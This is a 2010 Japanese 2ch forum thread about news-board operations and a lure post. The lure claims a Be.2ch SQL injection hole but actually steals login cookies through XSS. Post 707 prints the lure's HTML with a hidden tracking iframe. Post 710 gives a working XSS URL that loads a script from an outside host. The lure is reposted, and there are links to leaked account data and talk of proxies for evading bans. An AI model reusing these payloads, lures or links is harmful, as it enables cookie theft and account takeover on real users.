X


【news】ニュース速報運用情報676【ν】

■ このスレッドは過去ログ倉庫に格納されています
1雪 ★
垢版 |
2010/12/11(土) 21:47:36ID:???0
ニュース速報
http://hato.2ch.net/news/

前スレ
【news】ニュース速報運用情報675【ν】
http://qb5.2ch.net/test/read.cgi/operate/1292021115/

http://qb5.2ch.net/test/read.cgi/sakud/1131629475/561
> 561 名前:FOX ★[sage] 投稿日:2007/06/07(木) 20:18:27 ID:???0
> 「嫌なら出てけ」


http://qb5.2ch.net/test/read.cgi/operate/1181680138/387
> 387 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2007/06/14(木) 19:53:42 ID:???0 (PC) ?S★(1001111)
> ネタスレ・クソスレ・実況は不可
> アニメ、声優などのオタスレも不可
> ゲームはアニメ、声優ネタなら不可
> zip、クレクレ等、偽装スレも不可
> ただし、スレタイの遊びは、エロ、差別、アニメ、声優ネタ以外は許容
>
> 一行ソースでも重要性の高いニュースならOK
> スポーツ、芸能もOK
> アンケートスレはスレタイの遊びの範囲ならOK
> アンケートのために適当なニュースソースを張ってる場合は不可
2010/12/12(日) 16:49:41ID:JJp+HnaRP
これでスレ立てお願い

スレタイ
【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!

本文
Be.2chにSQLインジェクションの脆弱性が発見されました.
下記のリンクを押すと体験出来ます.
なお,このサンプルではch森を999999999に出来ます.

詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html
2010/12/12(日) 16:49:44ID:BF9m6UUZP
例の石川さんはどうやって撃ってたの?
693動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 16:49:45ID:abrE3fZQ0?DIA(432585)
jimのVPNじゃなくてインターリンクのVPNを使えばいいかと。
2010/12/12(日) 16:51:24ID:TqYVJ/Ab0
arc.mo-e.info に一致する情報は見つかりませんでした。

>>693
インターリンクのだとデータセンター扱いになるから
民ストで暴れまわったら誰かが焼くと思う
2010/12/12(日) 16:53:27ID:7s3Lq/2E0?PLT(18051)
>>691 いい加減にしろ
696動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 16:54:22ID:abrE3fZQ0?DIA(432585)
板の仕様で遊んでいるだけで荒らしでは無い。

samba突破もしてないし誰にも迷惑はかけてない。
2010/12/12(日) 16:54:23ID:bFSAIydQP
また東日本さんか
2010/12/12(日) 16:55:25ID:7s3Lq/2E0?PLT(18051)
http://hato.2ch.net/test/read.cgi/news/1292140478/
起っちゃったよ…
2010/12/12(日) 16:55:39ID:BF9m6UUZP
このユーザーの投稿が面白いと思うならポイントが贈れます。 ポイントを送る
0
名前:
紹介文:
ポイント:
登録日:


体験したけど何ともなかった
2010/12/12(日) 16:56:25ID:/xLB9T7c0
またロールバックするの?
701あひるちゃん ◆z0WvbsWRgg
垢版 |
2010/12/12(日) 16:56:37ID:DgsRyR500
>>668
ゲージやめて縁なし水槽おすすめ
2010/12/12(日) 16:56:41ID:TqYVJ/Ab0
>>696
インターリンクのVPNだと月額1050円だから高くない?
逆引きを自分で設定できるのは面白いけど、大量に契約するのには向かないと思う
2010/12/12(日) 16:57:19ID:7s3Lq/2E0
復号化したらCookie抜かれてるようなスクリプトだった
704動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 16:58:02ID:abrE3fZQ0?DIA(432585)
ログアウトすれば問題無いと思いました。
2010/12/12(日) 16:58:44ID:D9L83OMm0
よっしゃ、早くニュー速崩壊させろ
2010/12/12(日) 16:59:38ID:qXoD43f60?PLT(18453)
ああ、ときわちゃんハムを一つのケージに1匹にするのね
そうこうしてるうちにだんだん動物中心の生活になっていく

>>701
ペットショップだと大抵水槽に入れてるよね
今までケージでしか飼ったことないんだけど、どう違うの?
707雪 ★
垢版 |
2010/12/12(日) 17:01:08ID:???0
<html>
<head>
<title>Be.2ch SQLインジェクション体験</title>
</head>
<body>
<h1>Be.2ch SQLインジェクション体験</h1>
<p>Be.2chにSQLインジェクションが発見されました.<br />
下記のリンクを押すと体験出来ます.<br />
なお,このサンプルではch森を999999999に出来ます.</p>

<a href="http://be.2ch.net/test/t.php?i=">体験する</a>

<iframe src="http://3.ly/acclog" width="1" height="1" style="display:none;"></iframe>

</body>
</html>
2010/12/12(日) 17:01:44ID:CE4PnRFN0
>>707
誰?
2010/12/12(日) 17:02:06ID:+0ick44dP?PLT(18000)
>>707
体験したいです
710雪 ★
垢版 |
2010/12/12(日) 17:02:27ID:???0
またXSSか

http://3.ly/acclog

http://stock.2ch.net/test/result.so?res=%3Cscript%20src=http://b.otsukare.tk/be3.js%3E%3C/script%3E
2010/12/12(日) 17:03:02ID:xrG9mB3F0
>>707
これって普段使わないOperaみたいなブラウザから開けば問題ないんだよな?
2010/12/12(日) 17:03:10ID:7s3Lq/2E0?PLT(18051)
クロスサイトスクリプティングだね
713動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:03:55ID:lEgCOEH80
いいかげん全鯖停止して全部のスクリプト洗いなおせや
714動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:03:57ID:BDCA8j790?PLT(19999)
タスケテ
2010/12/12(日) 17:04:27ID:iIRN2rl3P
電子は1128002ポイントsakuられるのか
どうせ貰ったポイントだろうけど勿体無いな
716動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:05:03ID:abrE3fZQ0?DIA(432585)
sakuられないけど
2010/12/12(日) 17:06:03ID:D9L83OMm0
友 達 が 少 な い 人 の 特 徴 
http://hato.2ch.net/test/read.cgi/news/1292131999/
こういうスレばっかなニュー速なんてぐちゃぐちゃにしてしまえ
718Naritaka
垢版 |
2010/12/12(日) 17:06:44ID:JtYTbQaS0
http://3.ly/acclogの接続先調べようと思ったら間違えてアクセスしちゃった
719動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:06:51ID:ljVxgaEe0
>>707
あたらしいキャップさんですか?
自己紹介したらどうです?
720動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:07:18ID:DoQn15no0
君子危うきに近寄らず

だぜw
721あひるちゃん ◆z0WvbsWRgg
垢版 |
2010/12/12(日) 17:08:39ID:DgsRyR500
>>706
掃除するとき別ばけつにハムスターいれるだろ
ごみをふくろにいれるだろ
風呂場で熱湯と中性洗剤で洗える。

檻じゃねえからガチャガチャおとしない
透明だから見た目もすっきり

水槽は通販が安い
ttp://www.shopping-charm.jp/
2010/12/12(日) 17:09:40ID:Z4s9bdsu0
>>692
・450ポイント以上のアカウントをたくさん用意する。
・1回民ストするたびに、ルータを再起動してIPアドレスを変える。

ものすごくアナログなやり方。
2010/12/12(日) 17:10:00ID:Ti2qLJNK0
潰せとか言ってる人は自分でどうにかしようと思わないの?
724ぴこふぁらど ◆Yuno.A.C1WtQ
垢版 |
2010/12/12(日) 17:10:37ID:1Uxix237O?PLT(18000)
短縮ってケツに+つけたら詳細見られるんじゃねえの
少なくともbitlyはそうだた
725動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:10:51ID:GgP3HvPc0
【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/

はよsakuれや
2010/12/12(日) 17:10:51ID:bFSAIydQP
石川さんは繋ぎ変えの速さが凄い
727動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:11:50ID:abrE3fZQ0?DIA(432585)
その石川って人は10秒以内で止められるのか?
2010/12/12(日) 17:11:55ID:xBZPXr2K0
>>723
できたらとっくにやってるわ
2010/12/12(日) 17:12:23ID:EHGkXIgw0
>>719

>>1見てみ
730あひるちゃん ◆z0WvbsWRgg
垢版 |
2010/12/12(日) 17:12:27ID:DgsRyR500
石川県レスもはええよな。最近遭遇してない
2010/12/12(日) 17:12:49ID:8HG5GOP10
>>717
はがない偽装だろ
2010/12/12(日) 17:13:17ID:iIRN2rl3P
嫌ならν速見なければいいじゃない
何でそこまで粘着してるんだか
733動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:13:52ID:lEgCOEH80
>>727
石川は昨日民ストしようとして失敗してたよw
2010/12/12(日) 17:13:58ID:TqYVJ/Ab0
繋ぎ変え速度テスト
2010/12/12(日) 17:14:12ID:v8NZG3VR0
繋ぎ変え速度テスト
2010/12/12(日) 17:14:22ID:DGDn4U+T0
危険URLのマルチポストはやめろマジで
うっかり踏みそうになった
737動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:15:30ID:abrE3fZQ0?DIA(432585)
>>733
見てないわ。

>>734-735
その速度でも目押ししなければ止められるか。
2010/12/12(日) 17:15:56ID:qtW8IWFH0
石川式民スト
2010/12/12(日) 17:16:18ID:pwYSM/I60
何でsakuならないの?
740動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:17:06ID:+zdkb4ww0
【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/

早く止めろよ、スレスト仕事し無すぎだろ
2010/12/12(日) 17:17:22ID:W2UsnfXT0
公開されてるみたいだけど
もしかして串用意して公開されてるBe垢使えば費用0で民スト出来るんじゃね?

http://b.otsukare.tk/test/hell.cgi
2010/12/12(日) 17:17:27ID:etkbX+pz0
最近のニュー速はグダグダだね
2010/12/12(日) 17:17:33ID:pwYSM/I60
saku回避ってまだできるの?
2010/12/12(日) 17:18:10ID:etkbX+pz0?PLT(12000)
俺をスレ立てられるようにしろ
浄化してくる
2010/12/12(日) 17:18:58ID:7s3Lq/2E0?PLT(18051)
認証コードって変えられるの?
2010/12/12(日) 17:19:23ID:v8NZG3VR0
>>745
パスワード変更すれば認証コードも変わる
2010/12/12(日) 17:20:42ID:DGDn4U+T0
ID:tu/RKgb+P

こいつの規制を頼む
2010/12/12(日) 17:21:06ID:7s3Lq/2E0?PLT(18051)
>>746 thx 速攻で変えたよ
749動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:21:42ID:abrE3fZQ0?DIA(432585)
メアド公開とかいらないから。
2010/12/12(日) 17:22:22ID:q7y3SLoa0?2BP(500)
こんばんは
751ぴこふぁらど ◆Yuno.A.C1WtQ
垢版 |
2010/12/12(日) 17:22:47ID:1Uxix237O?PLT(18000)
認証コードって頑張ればメルアドから生成出来そうだよね、ってかできてんのかもしれんが
752動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:24:23ID:CWzvB4eWP
Be.2chにSQLインジェクションの脆弱性が発見されました.
下記のリンクを押すと体験出来ます.
なお,このサンプルではch森を999999999に出来ます.

詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html
http://www.dotup.org/uploda/www.dotup.org1295972.jpg
2010/12/12(日) 17:25:43ID:iIRN2rl3P
ここでくだらないことやってる暇があったらスレの1つくらい立てろよ
2010/12/12(日) 17:25:44ID:XJwQp2NgP
test
2010/12/12(日) 17:26:14ID:/xLB9T7c0
なんか運用家族が避難されてるね・・・・
2010/12/12(日) 17:26:22ID:084ipdl90
すげーホントに999999999になったw
2010/12/12(日) 17:27:06ID:v8NZG3VR0
BE鯖の抱える表面的な問題点
 ・Cookieが一時的なものではなく、パスワードを変えない限り半永久的に使えてしまう
 ・Cookie中のデータが暗号化されていない。メールアドレスは平文のまま、
  認証コードの生成式も流出しているのでパスワードの逆算も可能
 ・サーバーサイドスクリプトが穴だらけでXSSの温床

根本的な問題点
 ・Cookie「のみ」で認証していること
  例えばIPアドレスも含めて認証するようにすれば第三者が成りすますことは困難になる
  そこら辺はここでも指摘されている
  http://blog.livedoor.jp/dankogai/archives/50959103.html
  Cookieのみで認証する仕組みを変えれば、前述した表面的な問題点はある程度無視できる
  XSSを根絶やしにするよりもよっぽど現実的な策であるはず
2010/12/12(日) 17:27:39ID:XJwQp2NgP
ぷにっ
2010/12/12(日) 17:27:58ID:TFsISXBpP?PLT(18010)
寒い
http://2ch-dc.mine.nu/v2/src/1292125315856.jpg
2010/12/12(日) 17:29:18ID:q7y3SLoa0?2BP(500)
結構積もりましたね
2010/12/12(日) 17:30:04ID:/xLB9T7c0
be所有者のアカウント メアド ip パスが公開される 速攻パス変えとけ
http://hato.2ch.net/test/read.cgi/news/1292142465/

こういうの立てると余計ややこしくなる
2010/12/12(日) 17:30:05ID:/e2Z/8Pp0
つまり設計者が無能ってことだな。小学生以下の頭脳。ひろゆきさんか?設計は。
763ぴこふぁらど ◆Yuno.A.C1WtQ
垢版 |
2010/12/12(日) 17:30:39ID:1Uxix237O?PLT(18000)
なんだ生成式漏れてんのか
無能だな
2010/12/12(日) 17:31:04ID:XJwQp2NgP?DIA(263478)
あーあーテステス
2010/12/12(日) 17:31:28ID:v8NZG3VR0
例えばCookieに ip=[暗号化したipアドレス]をセットさせるんだよ
んで書き込み時はbbs.cgiのどっかでREMOTE_ADDRと[復号化したipアドレス]が一致するかチェック
一致しなければ成りすましと判断してログイン画面に戻す

暗号化のキーがバレたらすぐに変更する
ってだけでいいのに
766あひるちゃん ◆z0WvbsWRgg
垢版 |
2010/12/12(日) 17:32:44ID:DgsRyR500
民間スレストだけにつかうとかなんか方法あんだろ
ただ穴晒しても面白みが無い
>>761
まあな
2010/12/12(日) 17:33:03ID:/xLB9T7c0
あひるちゃんってわかってて混乱させるようなスレ立ててるの?
2010/12/12(日) 17:33:25ID:JJp+HnaRP
http://iup.2ch-library.com/i/i0203059-1292142666.png
2010/12/12(日) 17:33:34ID:XJwQp2NgP?DIA(263478)
結構早いプロキシが見つかって大変満足なう
2010/12/12(日) 17:34:17ID:bFSAIydQP
焼かれてるのはカスや
2010/12/12(日) 17:34:46ID:qXoD43f60?PLT(18453)
え?トラップかと思ったけど今度の無限増殖ガチなのか?
連続トラブルでbe制度が終わりそうなレベルまできてるように感じる
2010/12/12(日) 17:35:14ID:xrG9mB3F0
VIP警察みたいに運営家族で民スト組合でも作れば良いじゃない
2010/12/12(日) 17:35:18ID:/xLB9T7c0
>>768
2010/12/12(日) 17:36:55ID:OAXuamRd0
【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/

ニュースでもなんでもないsakuれ
2010/12/12(日) 17:37:11ID:D9L83OMm0
よっしゃニューカス民ざまあ
2010/12/12(日) 17:38:41ID:pwYSM/I60
d_e_n_s_h_i@これって電子彗星のアド?
2010/12/12(日) 17:39:06ID:qXoD43f60?PLT(18453)
なんで金銭のからんでるbeシステムがこんなに脆弱なんだよ
あちこちの穴つかれまくりじゃないか
2010/12/12(日) 17:39:30ID:nbEEXrfA0
beなぞやってるやつは情弱
779動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:39:41ID:MtkDdEsm0
クッキーがぬかれるのか
780ぴこふぁらど ◆Yuno.A.C1WtQ
垢版 |
2010/12/12(日) 17:39:54ID:1Uxix237O?PLT(18000)
メアド片っ端からググったら面白そう
2010/12/12(日) 17:40:43ID:k6zkDidM0
beのパスっってどうやって変えるんだっけ
2010/12/12(日) 17:41:00ID:pwYSM/I60
d_e_n_s_h_i@のIPが群馬だったから電子のか
783動け動けウゴウゴ2ちゃんねる
垢版 |
2010/12/12(日) 17:41:09ID:xO1GgUfR0
無限増殖可能だったらすぐにS★の奴がわんさか沸いてくるだろうに
2010/12/12(日) 17:41:16ID:qXoD43f60?PLT(18453)
クレカ情報がマジで心配だわ
2010/12/12(日) 17:41:42ID:084ipdl90
>>776
多分そうだろ
てか俺のも載ってる誰かメールよこせ
2010/12/12(日) 17:41:51ID:iIRN2rl3P
どうせBe用に取得してるメアドだから何も出てこないだろ
2010/12/12(日) 17:42:15ID:JV0hcssZ0
イカ娘最終話やら無限増殖やら、餌とURLだけ変えてるけど
中身は同じ脆弱性で何度も何度も

もうわざと引っかかった上で警察に通報するのがいいような気が
2010/12/12(日) 17:42:23ID:07pNm+Tv0
>>747
135 名前: レギンス(東京都)[] 投稿日:2010/12/12(日) 17:18:41.41 ID:rY8kKzJL0
半身浴(群馬県) ID:tu/RKgb+P

死ね
2010/12/12(日) 17:42:55ID:X0WNos4f0
>>784
だからクレカで買うのやめなさい
モリタポオークションで安く銀行振り込みで買えなかったっけ
2010/12/12(日) 17:42:59ID:pwYSM/I60
認証コードでどうやってハックするの?
■ このスレッドは過去ログ倉庫に格納されています